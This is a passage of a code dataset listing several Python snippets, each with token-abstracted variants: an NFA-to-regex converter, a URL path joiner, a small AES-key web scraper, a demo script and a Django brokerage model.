return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n 
print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n", "<import token>\n<assignment token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n 
return out\n\n\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n 
self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' 
% input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' 
% input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n <function token>\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n <function token>\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' 
% input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass NetworkNFA(NFA):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n", "<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n<function token>\n" ]
false
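The record above (and its token-abstraction steps) implements NFA-to-regex conversion by state elimination: dummy start/final states qs/qf are added, parallel edges between each node pair are collapsed into a single '+' alternative, non-start/non-terminal ("pliable") nodes are eliminated farthest-from-final first while their self-loops are folded into '*' factors, and the surviving branches out of qs are factored by common prefix/suffix. A minimal usage sketch follows; the original imports were elided as <import token>, so the module layout is an assumption (Node, NFA, and AutomataError presumably live in a local automata module, the addNode/addTerminal/start members are assumed on the base NFA class, and the remaining helpers are standard library).

from copy import copy                  # used by copyDeltas and NetworkNFA
from functools import reduce           # used to union delta destinations
from os.path import commonprefix       # used to factor shared branch prefixes
from automata import Node, NFA, AutomataError  # hypothetical module name

# Two-state NFA accepting one or more 'a'.
q0, q1 = Node('q0'), Node('q1')
nfa = NFA()                      # assumed no-argument constructor
nfa.addNode(q0)
nfa.addNode(q1)
nfa.start = q0
nfa.addTerminal(q1)
nfa.addDelta(q0, 'a', q1)        # q0 --a--> q1
nfa.addDelta(q1, 'a', q1)        # self-loop on q1
print(nfa2regex(nfa))            # expected output along the lines of 'aa*'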
95
aa579025cacd11486a101b2dc51b5ba4997bf84a
class UrlPath:
    """Joins URL path segments, ensuring exactly one '/' after each segment."""

    @staticmethod
    def combine(*args):
        result = ''
        for path in args:
            # Append the segment as-is if it already ends in '/',
            # otherwise add the separator ourselves.
            result += path if path.endswith('/') else '{}/'.format(path)
        # result = result[:-1]  # uncommenting would drop the trailing slash
        return result
[ "class UrlPath:\n @staticmethod\n def combine(*args):\n result = ''\n for path in args:\n result += path if path.endswith('/') else '{}/'.format(path)\n #result = result[:-1]\n return result", "class UrlPath:\n\n @staticmethod\n def combine(*args):\n result = ''\n for path in args:\n result += path if path.endswith('/') else '{}/'.format(path)\n return result\n", "class UrlPath:\n <function token>\n", "<class token>\n" ]
false
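Record 95's combine() appends one '/' to every segment that lacks it, so the result always keeps a trailing slash (the commented-out line is what would strip it), and slashes already present are never deduplicated. For example:

print(UrlPath.combine('https://example.com', 'api', 'v1'))  # 'https://example.com/api/v1/'
print(UrlPath.combine('api/', '/users'))                    # 'api//users/' - the leading '/' is not merged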
96
a1304f290e0346e7aa2e22d9c2d3e7f735b1e8e7
# We don't need no stinking models but django likes this file to be there if you are an app
[ "\n# We don't need no stinking models but django likes this file to be there if you are an app\n", "" ]
false
97
368e209f83cc0cade81791c8357e01e7e3f940c8
#!/usr/bin/python3
# Scrapes an AES key from freeaeskey.xyz: the key is published between
# the first <b> and </b> tags in the page body.

import requests
import urllib3

urllib3.disable_warnings()  # silence the InsecureRequestWarning from verify=False
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
key = data[data.index(b'<b>') + 3:data.index(b'</b>')]  # +3 skips past '<b>'
print(key.decode('ascii'))
[ "#!/usr/bin/python3\n\nimport requests\nimport urllib3\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>')+3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n\n", "import requests\nimport urllib3\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>') + 3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n", "<import token>\nurllib3.disable_warnings()\nresponse = requests.get('https://freeaeskey.xyz', verify=False)\ndata = response.text.encode('utf-8')\nkey = data[data.index(b'<b>') + 3:data.index(b'</b>')]\nprint(key.decode('ascii'))\n", "<import token>\nurllib3.disable_warnings()\n<assignment token>\nprint(key.decode('ascii'))\n", "<import token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
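Record 97 fetches the page with TLS verification switched off and slices out whatever sits between the first <b>...</b> pair. A slightly hardened variant under the same scraping convention; only the timeout, the status check, and the second index() argument are additions, everything else mirrors the record:

import requests
import urllib3

urllib3.disable_warnings()        # verify=False would otherwise warn on every call
resp = requests.get('https://freeaeskey.xyz', verify=False, timeout=10)
resp.raise_for_status()           # fail loudly instead of slicing an error page
data = resp.content               # raw bytes; matches text.encode('utf-8') on UTF-8 pages
start = data.index(b'<b>') + len(b'<b>')
key = data[start:data.index(b'</b>', start)]
print(key.decode('ascii'))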
98
57516a17c1f3ee208076852369999d74dbb2b3ba
def helloWorld(): print "We are in DEMO land!" for i in range(10): helloWorld() print listBuilder() def listBuilder(): b = [] for x in range(5): b.append(10 * x) return b print "[done, for real]"
[ "def helloWorld():\n print \"We are in DEMO land!\"\n\nfor i in range(10):\n helloWorld()\nprint listBuilder()\n\ndef listBuilder():\n b = []\n for x in range(5):\n b.append(10 * x)\n return b\n\nprint \"[done, for real]\"\n" ]
true
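Record 98 is the only row here flagged error: true, and for good reason: the file is Python 2 (the bare print statements fail to parse under a Python 3 pipeline), and even under Python 2 the module-level print listBuilder() runs before listBuilder is defined, raising a NameError. A sketch of the same file ported to Python 3 with the ordering fixed:

def helloWorld():
    print("We are in DEMO land!")

def listBuilder():
    b = []
    for x in range(5):
        b.append(10 * x)  # builds [0, 10, 20, 30, 40]
    return b

for i in range(10):
    helloWorld()
print(listBuilder())
print("[done, for real]")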
99
174f744b641ee20272713fa2fe1991cb2c76830a
from django.db import models

class Brokerage(models.Model):
    BrokerageName = models.CharField(max_length=500)
    # TODO: fix additional settings for ImageFields/FileFields
    # BrokerageLogo = models.ImageField
    ReviewLink = models.CharField(max_length=1000)
    ContactLink = models.CharField(max_length=1000)
    TotalAgents = models.IntegerField()
    Location = models.CharField(max_length=500)
    Desks = models.IntegerField()
    YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
    CommisionSplit = models.CharField(max_length=8)
    # TODO: set a getter for Cap that returns None when unset
    Cap = models.DecimalField(max_digits=12, decimal_places=2)
    TrainingPerWeek = models.IntegerField()
    Onboarding = models.BooleanField()
    Mentorship = models.BooleanField()
    Teams_Hiring = models.BooleanField()
    Marketing = models.CharField(max_length=500)
    TotalListings = models.IntegerField()
    ConferenceRooms = models.BooleanField()
    OfficeLeaders = models.CharField(max_length=500)
    # OfficeLeaderPhoto = models.ImageField
[ "from django.db import models\n\nclass Brokerage(models.Model):\n\tBrokerageName = models.CharField(max_length=500)\n\t#To-Do Fix additional settings for ImagesFields/FileFields\n\t#BrokerageLogo = ImageField\n\tReviewLink = models.CharField(max_length=1000)\n\tContactLink = models.CharField(max_length=1000)\n\tTotalAgents = models.IntegerField()\n\tLocation = models.CharField(max_length=500)\n\tDesks = models.IntegerField()\n\tYearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)\n\tCommisionSplit = models.CharField (max_length=8)\n\t#To-Do set a getter for Cap that returns none\n\tCap = models.DecimalField(max_digits=12, decimal_places=2)\n\tTrainingPerWeek = models.IntegerField()\n\tOnboarding = models.BooleanField()\n\tMentorship = models.BooleanField()\n\tTeams_Hiring = models.BooleanField()\n\tMarketing = models.CharField(max_length=500)\n\tTotalListings = models.IntegerField()\n\tConferenceRooms = models.BooleanField()\n\tOfficeLeaders = models.CharField (max_length=500)\n\t#OfficeLeaderPhoto = models.ImageField\n\n", "from django.db import models\n\n\nclass Brokerage(models.Model):\n BrokerageName = models.CharField(max_length=500)\n ReviewLink = models.CharField(max_length=1000)\n ContactLink = models.CharField(max_length=1000)\n TotalAgents = models.IntegerField()\n Location = models.CharField(max_length=500)\n Desks = models.IntegerField()\n YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)\n CommisionSplit = models.CharField(max_length=8)\n Cap = models.DecimalField(max_digits=12, decimal_places=2)\n TrainingPerWeek = models.IntegerField()\n Onboarding = models.BooleanField()\n Mentorship = models.BooleanField()\n Teams_Hiring = models.BooleanField()\n Marketing = models.CharField(max_length=500)\n TotalListings = models.IntegerField()\n ConferenceRooms = models.BooleanField()\n OfficeLeaders = models.CharField(max_length=500)\n", "<import token>\n\n\nclass Brokerage(models.Model):\n BrokerageName = models.CharField(max_length=500)\n ReviewLink = models.CharField(max_length=1000)\n ContactLink = models.CharField(max_length=1000)\n TotalAgents = models.IntegerField()\n Location = models.CharField(max_length=500)\n Desks = models.IntegerField()\n YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)\n CommisionSplit = models.CharField(max_length=8)\n Cap = models.DecimalField(max_digits=12, decimal_places=2)\n TrainingPerWeek = models.IntegerField()\n Onboarding = models.BooleanField()\n Mentorship = models.BooleanField()\n Teams_Hiring = models.BooleanField()\n Marketing = models.CharField(max_length=500)\n TotalListings = models.IntegerField()\n ConferenceRooms = models.BooleanField()\n OfficeLeaders = models.CharField(max_length=500)\n", "<import token>\n\n\nclass Brokerage(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n" ]
false
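Record 99 leaves two image fields commented out pending "additional settings". A hedged sketch of what enabling them usually takes in Django; the upload_to paths are invented for illustration, and ImageField additionally requires the Pillow package plus MEDIA_ROOT/MEDIA_URL configuration:

BrokerageLogo = models.ImageField(upload_to='brokerage_logos/', blank=True)     # hypothetical path
OfficeLeaderPhoto = models.ImageField(upload_to='office_leaders/', blank=True)  # hypothetical path

The Cap TODO ("returns None") is usually handled at the field level rather than with a getter:

Cap = models.DecimalField(max_digits=12, decimal_places=2, null=True, blank=True)  # NULL now means "no cap"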